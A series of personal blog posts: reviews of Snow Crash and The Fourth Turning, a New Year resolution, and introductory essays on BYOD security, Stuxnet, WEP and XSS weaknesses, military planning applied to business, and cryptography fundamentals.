Book Review – Snow Crash

Snow Crash

by Neal Stephenson

Snow Crash is an iconic book. Some would say a masterpiece. Written around 1990 and published in 1992, it is one of the seminal novels which first sought to use the prospect of an emerging plane of existence which would be made possible by the idea of a future global computer network. It could also be thought of as ancestral to the matrix. That it predicted this future from a time where very few people even owned a computer and a smaller fraction had it connected up to the rest of the world is probably no great feat but the way in which the novel conjured an imagination which so seemed to resemble what came decades later is impressive.

I only heard about this book in late 21 and when I did I bought it on kindle and it sat in my library gathering e-dust. But Id heard a lot about the metaverse and what with the decision by Facebook to rebadge to Meta among other things, I decided to give it a shot.

From the start it sets a high pace and keeps the interest up as it paints a picture of a near future world in which corporatism seems to have won the war against the nation state. Its set around LA and paints a picture of a pretty dystopic future blighted by lack of resources and the ever present abyss into which anybody could fall if things don’t work out.

The metaverse portrayed seems to be quite a primitive one (albeit very developed) by todays standards of graphics and this was something I found intriguing as an example of the true difficulty in imagining our possible futures. The main character is half black and half Japanese and works as a pizza deliverer in a world where the stakes for not delivering a pizza on time are probably painful and possibly terminal. Enter the skateboarding hoverboarding courier who saves his bacon when he looks set to miss his deadline. From there the book hurtles into an exciting and enthralling storyline which follows the well worn path of increasing stakes and increasing jeopardy. I’ll avoid giving too much away by going into any more detail.

Overall, this book was an enjoyable read. It served up an exciting and riveting story set in a fascinating world of technological marvel and brutish reality counterpoised in equal measure. I have to say however, it didn’t reach the highs I’ve experienced with some books where I really didn’t want to stop reading until Id got to the end. The story delivered enough but not much more than that. This said, the overall impression was of a well crafted tale suspended around curious characters and set in a fascinating world. For me its highly recommended and Id give it 3.5/5 stars.

BYOD Policy, Risks & Strategies

The defining characteristic of any technological artefact is its utility. For information networks, utility is almost analogous to flexibility and indeed, somewhat antithetical to security. Against this, the notion of Bring Your Own Device (BYOD) creates a push-pull. A push in qualitatively facilitating utility via ANY device and a pull demanding policy constraints in the name of security are observed. In opening a network to ANY device, which is essentially what the concept of BYOD means, we balance these contending priorities by judiciously redefining where our trust boundaries1 lie and subsequently pivoting to an adaptive posture which has the capability to flex when needed.

To facilitate this examination lets consider the two very different BYOD use cases of classroom and office. In the case of the classroom, BYOD democratises value and enhances inclusivity and, in the office, it amplifies productivity and facilitates agility. Each of the use cases considered demonstrates a different resultant in the trade-off between the contending arenas of the people process and technology trilemma presented in Palanisamy et al2,3

Looking first at the classroom, as alluded to previously, the calculus of threat adopts a specific posture in response to the gamut of socio technical factors at play such as the ages, capabilities and ideology of people, the rigour of overarching process and the limitations in terms of technology. It must also be noted that the worst credible outcome is reasonably limited in scope in this environment. It is reasonable to conclude that the desire to afford students a level and inclusive playing field in terms of the gains which BYOD brings to their educational experience moves the needle towards less rigour and more openness.

Conversely, in a corporate environment, the demands in terms of policy, education, and process are likely to be significantly more restrictive. Indeed, as described in Belanger et al4, they tend to dissuade the user from enjoying the additional facility BYOD can provide due to their concerns about self-efficacy.5 Additionally, their ability to bring a device that meets the narrower definition of what is acceptable in terms of the technology of hardware and software, further challenges. In this situation, the stakes are higher, the worst credible outcome more forbidding, whilst the people are likely to be more compliant to policy, receptive to education and the technology more restrictive.

Looking a little more closely at the realm of the technical challenges to BYOD, we must focus first on the temporal nature of a threat surface. Keeping devices updated is fundamental to a coherent and effective security policy. The threats that a failure to do this can expose resources to, can manifest themselves in two ways. First, the timely and regular patching of all software in use on our devices is essential to attain and retain a protected threat surface. Vulnerabilities are being discovered all the time and unless software is patched with fixes as they are developed and promulgated, simply standing still subjects a device to an ever-increasing pool of potential exploits to which it is vulnerable. Indeed, the vulnerability to an exploit becomes amplified once the exploit has been discovered, announced and patched. Second, the generational nature of hardware means that it is typical for step-changes in hardware to be accompanied by step-changes in the software which runs on it. Practically this can mean that certain devices of a given obsolete hardware are simply not capable of being patched with software which is being kept up to date.

In addition to this issue the simple numbers of new models appearing in common use by the average user has increased exponentially and continues to grow. Palanisamy2 states that, “Today, employees and their mobile devices are inseparable and very much part of their daily lives”2 The proliferation of devices and use cases makes it more challenging to negotiate policy space such that processes can cover the maximum if not all the devices which may appear at the site. Most BYOD devices are wireless but not all and this too presents further complexity.

Looking next at the practice of password management, effective password management governed by stringent policies forcing users into restrictive practices of renewal and complexity is superficially sound but Zhang, Montrose et al6 demonstrate that the argument is far more nuanced than most discourse reflects. They call into question the continued use of expiration and complexity as a metric and, in the longer term, provide evidence to facilitate a move away from passwords altogether. Given however that passwords will be a component of our defence in depth for quite some time yet, the necessity to co ordinate the requirements with the likely weaker behaviours observed when users are managing their own devices becomes stark.

Logging also described in7 as an integral part in the jigsaw of defence in depth and likely to be barely used in BYOD devices is worth consideration. In a network comprised of corporate hosts under comprehensive management, logging of events to a central repository will be highly recommended but the achievement of a comparable level of protection in terms of accounting presents a significant challenge. Fortunately, off-the-shelf solutions exist for mobile device management (MDM) and mobile application management (MAM). Such services eg Microsoft Intune8, provide an overarching technological and policy framework to ensure that rigour is applied to a BYOD network without the need for a piecemeal approach. Specifically, to the above considerations, it makes the access of BYOD devices contingent upon running an approved combination of hardware and software and ensures that password policy is applied without exception. Furthermore, by maintaining a record of devices connected and maintaining enhanced logging over many aspects of their activity, the question of a lack of logging is also addressed in such a way as to tie the activity tightly to the host. This system too however is at the mercy of its own currency of patching and can, if allowed to lapse, present a system with new vulnerabilities.


  1. Shostack, A. (2014) Threat modeling. 1st ed. Indianapolis: Wiley.
  2. Palanisamy, R., Norman, A.A. and Mat Kiah, M.L. (2020) ‘BYOD Policy Compliance: Risks and Strategies in Organizations’, The Journal of computer information systems, pp. 1–12. doi:10.1080/08874417.2019.1703225.
  3. Schlarman, S. (2001) ‘The People, Policy, Technology (PPT) Model: Core Elements of the Security Process’, Information systems security, 10(5), pp. 1–6. doi:10.1201/1086/43315.10.5.20011101/31719.6.
  4. Belanger F, Crossler RE. Dealing with digital traces: understanding protective behaviors on mobile devices. J Strateg Inf Syst. 2018;28(1):34–49. doi:10.1016/j.jsis.2018.11.002.
  5. Bandura, A. (1995) Self-efficacy in changing societies. Cambridge: Cambridge University Press.
  6. Zhang, Y., Monrose, F. and Reiter, M. (2010) ‘The security of modern password expiration’, in Proceedings of the 17th ACM conference on computer and communications security. ACM, pp. 176–186. doi:10.1145/1866307.1866328.
  7. Gilbert, J., Diogenes, Y. and Mazzoli, R. (2016) Enterprise Mobility with App Management, Office 365, and Threat Mitigation: Beyond BYOD. Pearson Education.
  8. Microsoft (2021) Microsoft Intune is an MDM and MAM provider for your devices. Available at: (Accessed:02 Dec 2021).

Book Review – The Fourth Turning

The Fourth Turning: What the Cycles of History Tell Us about America’s Next Rendezvous with Destiny

by William StraussNeil Howe

So for week one, I cheated a little as Id been reading this book since November but I make no apologies for that. Its a book with its own website ( and is one I found out about whilst watching a YouTube video ( featuring Raoul Pal and Robert Breedlove. Its a powerful video on its own and one which I recommend you watch but as to the book, it did not fail to impress although not as much as I’d hoped it would.

The premise of the book is that the human race, demographically and socially exists to a meta level cyclical beat and that the beat, which repeats itself every 80-100 years and is known as a saeculum among other things, contains four generations of the human lifecycle. Indeed, it carries THE four generations of the human lifecycle, pueritia, iuventus, virilitas and senectus.

The book presents a fascinating description of the history of humanity going back to late medieval times against this context and does so quite persuasively. In doing so it categorises the generations of human society within a saeculum as four stereotypes namely prophet, nomad, hero and artist. It also defines the four parts of a saeculum as societal high, awakening, unravelling and crisis.

There is much about this book that is speculative, indeed at times it felt a bit like reading a horoscope but the underlying premise is fascinating and has merit. Whilst the speculation seemed to detract from the book somewhat and it could probably have been written in 60% of the word count, I’d recommend it as a 3.5 out of 5.

Happy New Year 2022

So its 2022. Another year gone and a new one already driven off the forecourt. New year means new start and so we typically resolve to do things differently at this watershed moment in the year with a resolution. Im old enough now to know the pattern of behaviour I usually demonstrate with this act and its rarely a successful one. The best laid plans of mice and men…. But last year, I thankfully succeeded. I resolved to remove the booze from my life for the full year whilst getting fit by dropping my BMI from over 35 to under 25, and thankfully I succeeded.

So, fresh from the end of year splurge, newly invigorated and a little heavier again, I’ve made a new resolution. It builds upon the success of last year although Ill need a couple of weeks to undo the splurge and this year the theme is to S T R E T C H myself.

I feel like my weight/fitness issue is thankfully now under control so by way of capitalising on my new fitness, I want to move on to the next phase and stretch my mind as well as my body.

A few years ago I read nearly a hundred books in a year. My goal was to hit the hundred and I fell short but it was truly a wonderful experience for mind, body and soul. I’ve always been aware of the value of books and have always striven to read more than I do however usually that sentiment just results in a persistent guilt that I don’t. So this year the target is simple. Read one book per week, every week and to keep me honest I’ll write a review here on my blog of each book I read.

Secondly, another area I’ve known I should do better at is in physical stretching. I simply have never really done it at all apart perhaps grudgingly at the start of a run because everybody around me was doing it. So again, this year I resolve to stretch once a day and maybe throw in some floor exercises if the mood takes me. I’ll blog about it too, although perhaps a bit less regularly.

So there it is. A commitment in digital black and white. Watch this space for progress and growth.

PS. You can also find me on Goodreads at

Stuxnet: The Cyber Cruise Missile

The Internet was developed as a military system first and foremost and, as is often the case, the subsequent utility it has more recently afforded peacetime humanity is only a fringe benefit. The decision therefore, by Israel with, at the very least, the tacit support of the United States to develop offensive malware, whilst appearing on the face of it to be a watershed moment in the militarisation of the Internet, was actually the continuation of a long embedded trend line. The fact is, there was no Rubicon to cross and the trajectory of modern warfare will continue into cyberspace with increasing speed.

Against this backdrop then, the development of Stuxnet appears to have been the starting pistol of a new arms race in the field of cyberweapons. This field however is largely invisible and as a result is immune to the clamour for regulation that would accompany such a step change in real-world military technology under normal circumstances. Although it happened a decade ago, there is still no international treaty to limit the damage that can be brought to bear by a small fragment of computer code upon an entire country’s telecom, banking or energy infrastructure. The recent colonial pipeline event in the eastern United States will have left the west in no doubt that it is in everybody’s interests to push for one before the tables are further turned and more chaos is wrought upon society.

Stuxnet was developed with a single purpose in mind. Its development and level of complexity implies that it was only capable of being brought into existence by a nation state but for all its finesse, the deliberate network based isolation of the plant in Natanz, (the uranium enrichment facility in Iran which was its intended target) meant that it still had to be carried in by hand and delivered manually. It is almost certainly a measure of the chaotic picture in Natanz following its delivery, that the malware eventually made it back out into the wild and infected thousands upon thousands of systems worldwide.

The victims of the Stuxnet attack were ostensibly the Iranians but, as described already, there have been thousands of others in the intervening time since its release. This is the rub. It is extremely challenging for the creators of these nefarious programs to stop them after they have done what was intended and indeed the very creation of mechanisms to do this runs counter to their intended purpose in the first place.

The target of Stuxnet was an ICS (Industrial Control System). Such systems, often somewhat obsolete and poorly architected to cope with malware as well as more mainstream enterprise systems, are the systems which control our critical infrastructures such as energy, transport, telecom and industrial networks. These enormous networks, known collectively as operational technology as opposed to information technology fulfil a unique role in modern life and their disruption can be catastrophic with consequences up to and including massive loss of human life.

Stuxnet is a variety of malware known as a worm. It was first discovered by a security contractor in June 2010 and quickly became an almost household name due to the news coverage it attracted. Analysis of the source reveals that it has been developed to specifically target the SCADA (Supervisory Control And Data Acquisition) and PLC (programmable Logic Controller) systems used by Iranian nuclear R&D. It operates by attacking an MS Windows application used to control uranium enrichment centrifuges built by Siemens using the following five vulnerabilities:

  • MS08-067 RPC Vulnerability – allowed a remote user rights equal to a local user
  • MS10-046 – LNK Vulnerability – allowed remote insertion of malware
  • MS10-061 – Spool Server Vulnerability – allowed a malicious print request to take control of a server
  • MS10-073 – Win32k.sys Vulnerability – opens a vulnerability to execute kernel privileges
  • CVE-2010-2772 – Siemens SIMATIC Win CC Default Password Vulnerability – use of known default password to access the system3

Ultimately Stuxnet was successful in achieving its end goals but it also succeeded in achieving far more than that, attracted a lot of unwelcome publicity and ratcheted up the stakes in the business of cyberwarfare. One supposes that, if it hadn’t come along, another candidate would have but it is certain that Stuxnet changed the face of Critical Infrastructure Cyberespionage forever and there is no going back.

Old Hacks, New Pain

The video on the right is about ten years old but the techniques described are evergreen. Wifi – man in the middle attacks, web based client side injection attacks, USB flash drive malware and RFID attacks are all well known attack vectors in the security community but as we’ll go on to discuss here, whilst many of the challenges demonstrated in the video have been addressed, many also remain.
Lets take a look at each of these now in a little more detail.

Wireless Man In The Middle

Before the advent of ubiquitous public free WIFI. wireless networks were primarily to be found in private locations such as homes and offices. Back then, a practice called wardriving, (the ugly stepchild of wardialling) was the best way to get up to no good. Practitioners would assemble their toolkit of laptop, battery, amplifiers and fancy high gain antennas and head to the vicinity of these networks where they would snoop the network and look for opportunities to get up to mischief. Nowadays, all a miscreant needs to do is go buy a coffee, plonk themselves down in the corner and wait.

Ten years ago, WEP (Wired Equivalent Privacy) was still in quite widespread use and was woefully vulnerable to attack. With WEP in use, each packet is encrypted with an RC4 (Rivest Cipher 4 stream cipher. Multiple vulnerabilities have been discovered in RC4, rendering it insecure) cipher stream generated by a 64 bit RC4 key. The key is made up of a 24 bit IV (initialisation vector) and a 40 bit WEP key. The encrypted packet is generated by bitwise modulo 2 addition of the plaintext and the RC4 cipher stream.

WEP Weakness

The fact is, unless a protocol compels good key management practices, they will not happen. Poor quality and long lived keys can and most certainly do exist on WEP implementations and most WEP networks had one single WEP key shared between every host on the network. Everything on the network needed to be a holder of the key in some form and, since changing keys was tedious and burdensome, keys were rarely changed. Furthermore, a key size of 40 bits was a weakness in and of itself. 40 bits may have been acceptable in the late 90s, but nowadays its not enough.

In addition to the key management issues, the system has been designed with use of an initialisation vector that is too small. At 24 bits, a given WEP key only allows for 16,777,216 different RC4 cipher streams. If IV’s are reused then this becomes a problem. And they are. Another problem lies in the way that the IV is chosen. The specification does not define this and therefore reuse can become a significant problem.

WEP therefore, in summary, has significant design flaws and vulnerabilities.

Client-Side Injection Attacks

Client side injection attacks are basically a form of content spoofing which tricks a user into believing that certain content on a site is legitimately part of the web page and not inserted from another source.

Otherwise known as XSS (cross site scripting), these attacks allow an attacker to execute javascript in the target web browser which can be used to hijack sessions, modify sites, insert more insecure content or take over the target browser. All WAF (web application frameworks) are vulnerable to this type of attack if the website and associated code is constructed poorly. As mentioned before, the attacks typically use javascript but HTML can also be used as can any number of other scripting languages such as VB Script, ActiveX, Java or even Flash. The only prerequisite to the scripting language used is that it is supported by the browser.

XSS attacks typically come in one of two forms, namely persistent or non persistent. Persistent XSS attacks usually add malicious code to a site in the form of added links found in forum posts, emails in webmail clients and even chat conversations within browsers. Non persistent attacks require the user to click a link that has been modified with code which, when clicked is executed in the client browser.

Thumb drive trojans

Thankfully we have moved on from the days when operating systems like Windows XP would “auto run” some of the code on a thumb drive simply by virtue of being plugged in. Nowadays the latest operating systems avoid doing this because of the security threat that it can present. Nevertheless, unknown USB drives can contain malware which, when run, can infect the operating system with ransomware, or worse. Furthermore, even non executable files which typically attract less scrutiny that executables can contain malware which launches simply by opening the file.



Comment: User-ID: Paula Livingstone

Comment: Created: 17/09/2021 21:06

Comment: Expires: 17/09/2023 12:00

Comment: Type: 3,072-bit RSA (secret key available)

Comment: Usage: Signing, Encryption, Certifying User-IDs

Comment: Fingerprint: 41A29F9C450F142EF0E885D90049AACEC2B9837F








































File Carving With Machine Learning

In the world of digital forensics, “file carving” is the act of recovering deleted files from fragments which are either left behind on a fragmented hard drive or by-products of a partial overwrite to a sector of a hard disk despite the absence of the metadata used by the filesystem to make the file available ordinarily.

The Army Poses 7 Questions – Can Business Try It?

One of the major fundamentals of the doctrinal training of commanders in the British Army is what is known as The Combat Estimate. The Combat Estimate, when applied to a situation, provides a systematic mechanism with which to shake out a plan as a response to a situation framed within a given set of requirements. The application of the 7 questions as a planning tool ensures that all of the influencing factors which are pertinent to any situation are built into a plan which seeks to secure a given aim. That aim can be the storming of a well defended bunker, the destruction of an enemy fuel depot or indeed the organisation of a trip to the Alps to teach a group to ski. As is often the case with military doctrine, it is as applicable to a military situation as it is to a civilian one. Its value lies in its ability to systematically break down a complex environment in such a way as to methodically define the important influencing elements which are relevant to a particular aim. One may imagine that such martial thoroughness would be well placed in the business boardroom and one would be correct.

The Combat Estimate (7 Questions) is one of 3 methods that the British Army uses to parse complex sets of circumstances for the purpose of systematic analysis. The other two methods are called The Operational Estimate and The Tactical Estimate. Of the three, the Combat Estimate really comes into its own in situations where quick planning which seeks to exploit and maintain a high tempo adversarial advantage is required. It is therefore best applied at the tactical and operational level. Lets look at the questions in turn;

  1. What is the adversary doing and why and/or what situation do I face and why, and what effect do they have on me? This is a bit of a mouthful but it effectively requires examination of the broad constraints which will serve to hamper ones ability to complete an objective. The key takeaway from this question is “assess and prioritise” What is happening and how does it fit into my priorities?
  2. What have I been told to do and why? It’s essential to have a detailed understanding of the rationale behind what makes this task something that needs to be done. Furthermore, an ability to put oneself into the shoes of those in positions of authority whether that is your supervisor and their supervisor or indeed the broader needs of the organisation or company on who’s behalf you are acting is beneficial. Are your actions to be part of a larger master plan? It’s essential to build up this broader picture not only to understand how your task fits into other efforts but also to understand its priority, its dependants or antecedents, and more interestingly, what support you may be able to expect as you define interested parties more broadly. This information is one of the key components in the toolbox of the manager and their ability to motivate those involved in accomplishing the task.
  3. What effects do I need to have on the adversary or situation and what direction must I give to develop the plan? It is essential that you clearly understand your task and the intermediate key staging points which lead to its achievement. This is not only for your own clarity of purpose but also and perhaps more importantly as a basis of your ability to direct others in the execution of your plan. Having a clear and well structured definition of your aim ensures that you maintain your own focus not to mention are well able to articulate this to others within your purview which results, one hopes, in their taking of ownership of the task.
  4. Where and how can I best accomplish each action or effect? It is important to understand the situation thoroughly through the application of the previous questions and their outputs. At this stage one seeks to identify key resources, their priority and how to maintain control of them. It also begins to be possible to identify some lower level courses of action which will serve to consolidate into the broader strategy. A thorough examination of this question should produce a prioritisation of component parts of the overall strategy as well as an outline of the steps necessary to achieve each of them.
  5. What resources are needed to accomplish each action or effect? At this stage a planner, armed with the structured output of question 4 can begin to examine the resource requirements of each strand of the broader plan. Their earlier prioritisation assists in the allocation of resource where contention exists ensuring that resource whether manpower or equipment is distributed most efficiently. At this stage it also becomes clear whether it is necessary to request further resources as a prerequisite for the plans success. This question reaches both up and down your own command chain in order to ensure that the correct organisational capability is allocated. It is also the ideal time to revisit the output of question 2 and ensure that efforts and requirements are properly matched.
  6. When and where do the actions take place in relation to each other? It is important at this stage to begin to develop ones understanding of the temporal dimension of the plan. In a military environment this ensures that where potential exists for there to be conflict in the achievement of each effect, it is dealt with. In the boardroom, it enables individual strands of a broader planning structure to avoid duplication of effort or indeed the need to revisit certain actions. A useful tool to use at this stage is a timeline/sync matrix which provides a visual representation of the dependencies and outputs of each component part. A simple chart in the style of a Gantt chart is useful at this stage.
  7. What control measures to I need to impose? This question helps to define the boundaries of the plan as well as delineate the roles and responsibilities at a more granular level within the broader effort. By carefully examining this area we ensure that each of the component parts of our plan is equipped with the correct definition but also has sufficient scope of manoeuvre to flexibly respond to emergent conditions whilst keeping an eye on the end goal. By allocating an appropriate amount of responsibility one ensures that members of a team are able to utilise their own abilities to maximum effect in achieving the goal without stifling their latitude through unnecessary micro-management. In a business environment it is important to maintain awareness of budgetary limitations or perhaps cut-off dates.

The seven questions described above represent the systematic mechanism by which the military ensures that no facet of the overall planning landscape is overlooked. In military situations, such thoroughness is rewarded with minimising loss of life. Clearly it is therefore warranted however it is clear that business can benefit from such a structured approach to ensure the success of individual objectives up and down the chain of command. Throughout history civilian activity has embraced elements of military doctrine and procedure and will no doubt continue to do so. It is to be welcomed that the penalties in the business world very rarely extend to loss of life however where one seeks to do the best job possible with the resources available and in turn to minimise the chances of failure and their knock on effects, such thorough frameworks can clearly bring a great deal of value. Their application however piecemeal would seem to be a natural boon in the development of successful business practice in any field of operation.

Thanks for reading this post. It has been my pleasure to write it and I’d most certainly appreciate your feedback either by commenting on it in the comments section of my blog below or in the comments section on the platform you used to find it. I hope you also find some of my other posts on my blog of interest and am always happy to engage in discussion either online or offline in the development of these ideas. Happy planning.

Cryptography Fundamentals

In this post Ill take a very brief and broad look at some of the core principles and fundamental aspects of cryptography. As a practice it has been around for as long as humanity itself but as a science its history is a bit more recent having been around for a few decades at most. It will come as no surprise that the growth of the Internet, or perhaps more accurately, of Data Communications, which predates the Internet by a decade or three, has been one of the main drivers of the growth in the need for Cryptography. The prevalence and penetration of the Internet has now reached such high levels that there is barely a business in the developed world that does not rely nowadays upon effective encryption for its survival. So, this post is about security and the role played by cryptographic technology in data security. Its a bare introduction but I hope to add links to some blog posts which examine some of the more important areas more deeply so look out for them. The ability to secure data while it is in storage or in transit from an unauthorised compromising access is a critical function of information technology now. Indeed all forms of e-commerce such as credit card processing, equities trading or general banking data processing would, if compromised, lead to losses for the unfortunate organisations of billions of dollars/pounds/whatever not to mention the devastating cost in destruction of confidence going forward.

So lets look at a few high level topics to get going.

Information Theory

The fundamentals of information theory were famously defined by none other than the father of the information age, Claude Shannon in his seminal work from 1948, A Mathematical Theory of Communication. In this paper he defines the problem to which information theory purports to be the solution and makes many mathematical theories besides. More importantly, his work acted as a foundation upon which, time after time, the foremost minds of our science have expanded giving us the mature and usable communications mathematics we have today. Shannon’s paper did not come a moment too soon: this was an age in which the atomic bomb had just been developed, we were still a decade from the polio vaccine and Sputnik, and most pertinent, transistors were only just beginning to replace vacuum tubes in the design of digital machines (in fact, this is also thanks to Shannon). Information theory gave engineers, mathematicians, and scientists the necessary tools to analyse how well their machines were transmitting data to and from one another.

Figure 1 above, details Shannon’s communication model. The information source produces a message. The transmitter creates the signal to be transmitted through a channel; the channel is the medium carrying the signal. The receiver accepts the signal from the channel and transfers the signal back to the original message. The destination is the intended recipient of the message. The noise source introduces errors to the signal during transmission; it interferes with the signal, therefore distorting the transmission signal and impacting the transmitted message. Cryptography uses the same model. Shannon also talked in his paper about two other basic concepts: confusion and diffusion. We’ll look at these in more detail below.

In his paper, Shannon also explained that the statistical frequencies of repetition in the cipher-text (encrypted text) and the key (usually a string of numbers or letters that are stored in a file, which, when processed through a cryptographic algorithm, can encode or decode cryptographic data) should be as low as possible. In other words they should appear to be as random as possible exhibiting no discernable patterns. This is what he meant as confusion. Looking at the key again, if a small part of the key is changed, this should have a widespread knock on effect in changing the cipher-text throughout its scope. This is what he meant as diffusion. Without sufficient confusion and diffusion, it is possible to deduce the key from analysing the original plaintext beside the corresponding cipher-text.


Entropy is defined in the dictionary as a lack of order or predictability or as a gradual decline into disorder. In cryptography it represents the amount of randomness in a transmission. Any cryptographic algorithm should produce a cipher-text output which has as much entropy as possible in order to obfuscate the original plaintext from anybody who might examine the corresponding cipher-text. Plaintext transmissions contain order hat can be discerned by the observer even if one does not understand the language being used and it is this order that leads to an ultimate understanding whether it is a language to be decoded or an encrypted stream of text. Thus, discernable order is the enemy of encryption and therefore entropy is to be encouraged.

Random number generation

Randomness is essential for effective encryption and you may be surprised to learn that a computer cannot easily generate randomness. Everything a computer does is under the instruction of an underlying process or algorithm and it is for this reason that it is a significant challenge. This may come as no surprise to the lay reader since a computer may seem to be the ultimate expression of determinism however it is challenging to consider how one might mechanistically program a function or algorithm for generating randomness. In specific relevance to this post, cryptographic processes and algorithms require randomness to be secure as random numbers are required for key distribution, session key generation, generating keys for cryptographic algorithms, the generation of bit streams and initialisation vectors (IVs).

For computers to generate random numbers requires them to capitalise on sources of randomness and unpredictability. Shannon posited that to achieve randomness, two important components are required: a uniform distribution, and independence. In a uniform distribution, the occurrence of zeros and ones is equal. Independence means that no bit can be inferred from the others. Unpredictability is required for random number generation: each number is statistically independent of the other numbers in the sequence. In a computer, random numbers can be generated. Such random numbers are either true random numbers or pseudo random numbers. Thus, randomness can be produced by a true random number generator (TRNG), also known as a random number generator (RNG), or a pseudorandom number generator (PRNG).

As stated previously, deterministic computers cannot generate random numbers. That is to say they cannot do it without external assistance. A TRNG must therefore use an external ancillary non-deterministic source of entropy and some form of function designed to take the randomness provided externally as an argument such that a suitable random number is generated (entropy distillation process). The input source is typically a source of entropy from the physical environment, such as keystroke timing patterns, disk electrical activity or mouse movements; this source is combined with the processing function to generate the required random output in the form required.


In order to understand the concept of freshness properly, it is illuminating to first examine that of a replay attack. In a replay attack, an attacker records the transaction traffic on the network involved in logging in to a system then uses the recording played back, effectively resending what had been sent before, to gain access for themselves, even though the recorded traffic they resend may have been hashed or obfuscated.

The notion of freshness is something of an abstraction which tends to make its understanding less than intuitive but it effectively means that we ensure, by ensuring freshness, that each time we transact with a system in order to access it, the interaction traffic will never be the same as it was before. Now, in a world where we don’t want to change our passwords every time we log off, that seems like a challenge but its not too much of a challenge.

The way it is achieved is for the server to generate a one-time pseudorandom number which is sent to the client at the start of the authentication exchange. This number which will only ever be used once (abbreviated to nonce) is typically concatenated to the password before transmission to the server such that it becomes impossible to anticipate the required transmission in order to successfully complete a replay attack.

One-time pad (OTP)

One-time pads are a mainly theoretic encryption device which in theory provide the strongest possible cipher. This carries some caveats however in that the key must be provided and used properly within a strict set of rules. The theory behind the one-time pad is that the key must be at least the same length as the plaintext message and that the key must be truly random. The key and the plaintext are then combined using the most fundamental of encryption devices, the modulo 2 adder, otherwise known as an exclusive OR gate. The result, given a secure key which has not been compromised is cipher-text which has no direct relation to the original plaintext. To decrypt, the same key is used and the operation reversed. For this to actually be completely secure in theory, the following rules must be observed without exception:

  • The OTP (key) MUST be truly random
  • The OTP must be at least as long as or longer than the plaintext original
  • Only two copies of the OTP should exist
  • The OTP must be used only once
  • Both copies of the OTP must be destroyed immediately after use

The OTP process is only absolutely safe if and only if the preceding rules are strictly obeyed. Before computers this was a time-consuming and error prone task which rendered it all but impractical unless carried out by machines such as dedicated telegraphy encryption/decryption devices however nowadays it could conceivably be automated by a computer.

Surprisingly perhaps, manual OTP ciphers are still being used today for sending secret messages to agents (spies) via what are known as numbers stations, or one-way voice links (OWVL) both of which typically use HF transmission and can routinely be heard on short wave(HF) radio bands.

Avalanche effect

When it comes to encryption, one of the most attractive properties of cryptography is known as the avalanche effect, in which two different keys generate very different cipher text for the same input plaintext. As previously discussed, this makes two similar keys that generate different cipher text a source of confusion (Remember Shannon defined this as desirable). We can therefore measure or compare the efficacy of two different encryption algorithms with reference to the avalanche effect they bring about. Plaintext and encryption key are mapped in binary code before encryption process. Avalanche effect is calculated by changing one bit in the plaintext source whilst keeping the key constant and again differently, by changing one bit in the encryption key whilst keeping the plaintext constant. Empirical results show us that the most secure algorithms carry the most significantly high avalanche effect.

Kerckhoffs’ principle

Auguste Kerckhoffs was a linguist and military cryptographer in the late 19th century who had many essays on contemporary cryptography published at the time. A quote attributed to him from 1883 states

‘Military cipher systems should not require secrecy, and it should not be a problem if they fall into enemy hands; a cryptographic system should be secure even if everything about the system, except the key, is public knowledge’

Auguste Kerckhoffs (1883)

In other words, the key must be kept secret, not the algorithm.

XOR function

The XOR function has a unique place in cryptography and you may well ask why this function? Why not the AND gate or the OR gate. The answer is strikingly simple. In a nutshell the XOR operation is reversible. So, if a string of binary data were to be passed through the XOR function sequentially along with a key then the output, if passed as an input to another XOR function along with the same key will produce the original output.

The XOR is a binary operation described as a logic gate in a way that facilitates analysis in karnaugh maps and all of the other associated digital logic canon however, taking it out of the realm of digital logic circuits it is simply a way of expressing the act of modulo 2 addition without a carry. We will go on and investigate the utility of XOR/mod2adders in more detail in future posts and I will add links to them below as they are published.

Confidentiality, Integrity and Availability

Confidentiality, Integrity and Availability, collectively known as the CIA triad in the cyber security world and represent the three main elements of a fundamental model of the properties or attributes of a secure system. For example, if we consider a banking application which must certainly be beyond doubt in terms of its security, must exhibit confidentiality (must prevent any unauthorised access), integrity (must be a true reflection of the reality of the bank accounts and safe from unauthorised modification) and availability (be usable whenever it is needed). In cryptography we are not overly concerned with availability as it is not relevant to the field however a secure system will most certainly lose its availability if it were to lose its confidentiality or suffer a compromise of its integrity.

Again, we will look at these premises in more detail in other posts so it is sufficient for now to state them in this context.


Were it not the case that CIA presents such a handy mnemonic, non repudiation would very likely be involved with confidentiality, integrity and availability as the four principles of a secure system. As it is it is now an addendum to the axiom but an essential one none the less.

In a secure system we can think of the non-repudiation of the system as the application of an audit trail provided perhaps by logging. In logging every transaction, interaction and modification of a system and more importantly logging the identity of the entity who was responsible for initiating one of these actions, we ensure that the system under scrutiny in able to maintain its status.

By providing mechanisms which ensure non repudiation we provide an important mechanism for ensuring the survivability of a system through compromise and beyond, hopefully restored to a secure state once again.

For readers familiar with the reactive/proactive bowtie model of system assurance, non repudiation sits very firmly in the reactive side but is essential to a survivable robust secure environment.

Data origin and entity authentication

The subject of the authentication of data origin and entities is a complex and detailed one. Essentially, it is the affirmation that the entity believed to be the source of some data in an interaction is who or what it is believed to be. Ultimately, the receiver needs to have confidence that the message has not been intercepted and or modified in transit and this is accomplished by verifying the identity of the source of the message.

So, how do you prevent an attacker from manipulating messages in transit between an transaction source and its destination? The major considerations are as follows:

  • The recipient must confirm that messages from a source have not been modified along the way.
  • The recipient must confirm that messages from a source are indeed from that source.

Data Origin Authentication is the solution to these problems. The recipient, by verifying that messages have not been tampered with in transit (Data Integrity) and that they originate from the expected sender (Data Authenticity) confirms both considerations bulleted above. Entity authentication assures that entities are currently and actively involved in a communication session. In cryptography, this can be done by using freshness, as discussed earlier.

The three states of data

In distributed computer systems such as computer networks of any size, the data held by, shared and processed by these computational hosts is defined as being in three states. Those states are, rest, transit or use. Ultimately it is the job of and indeed the raison d’etre for our cryptographic algorithms to protect this data and in each of these three states the job of doing that takes on a slightly nuanced form.


This is data that is stored in data storage media such as magnetic disk drives, optical media or tapes. All data at rest requires to be physically stored in some form of device. Where it requires confidentiality and integrity protection it must be encrypted. The discussion of this topic must wrestle with such architectural considerations such as, do we encrypt the whole device or just the files themselves? Even considerations such as the additional overhead cost to the environment of the energy consumption of the large scale encryption of data at rest fall into this discussion.

Data-in-transit (motion)

Data in transit is data on the move. Moving can mean across space from a satellite to the earth, across oceans through an undersea fibre optic cable, across free space on a town centre public WIFI system, across an office building through the corporate network or even across a computer architecture from the data bus to the CPU. As you likely suspect, each of these cases has its own nuanced features but there are also shared common overarching consideration appropriate to all cases. This is an enormous field of activity so we will let it suffice for now that the treatment of data in transmission must be considered carefully and dealt with appropriately.

